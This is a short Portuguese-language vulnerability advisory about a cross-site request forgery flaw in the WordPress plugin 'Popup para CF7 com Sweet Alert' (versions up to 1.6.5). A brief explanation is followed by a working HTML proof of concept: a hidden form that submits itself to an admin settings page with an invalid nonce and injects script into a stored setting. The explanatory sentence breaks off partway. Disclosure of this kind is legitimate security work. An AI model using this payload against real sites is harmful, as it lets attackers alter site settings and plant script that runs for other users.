
Popup para CF7 com Sweet Alert <= 1.6.5 - Cross-Site Request Forgery
Popup para CF7 com Sweet Alert <= 1.6.5 - Cross-Site Request Forgery
https://wordpress.org/plugins/cf7-sweet-alert-popup/
O manipulador de configurações do plugin contém um erro de lógica na verificação de nonce, desativando toda a proteção CSRF. Um atacante não autenticado pode explorar isso enganando um administrador autenticado para visitar uma página maliciosa com um formulário oculto de envio automático, modificando arbitrariamente as configurações do plugin. Os valores enviados são armazenados sem sanitização e injetados literalmente em um bloco
<!DOCTYPE html>
<html>
<body>
<h1>Hello</h1>
<form style="visibility:hidden" action="http://TARGET/wp-admin/admin.php?page=cf7-simplepopup"
method="POST" id="csrf" target="hiddenframe">
<input name="cf7simplePopupWidth" value="500;alert(document.domain)">
<input name="cf7simplePopupNonce" value="invalid_nonce">
</form>
<script>document.getElementById('csrf').submit();</script>
</body>
</html>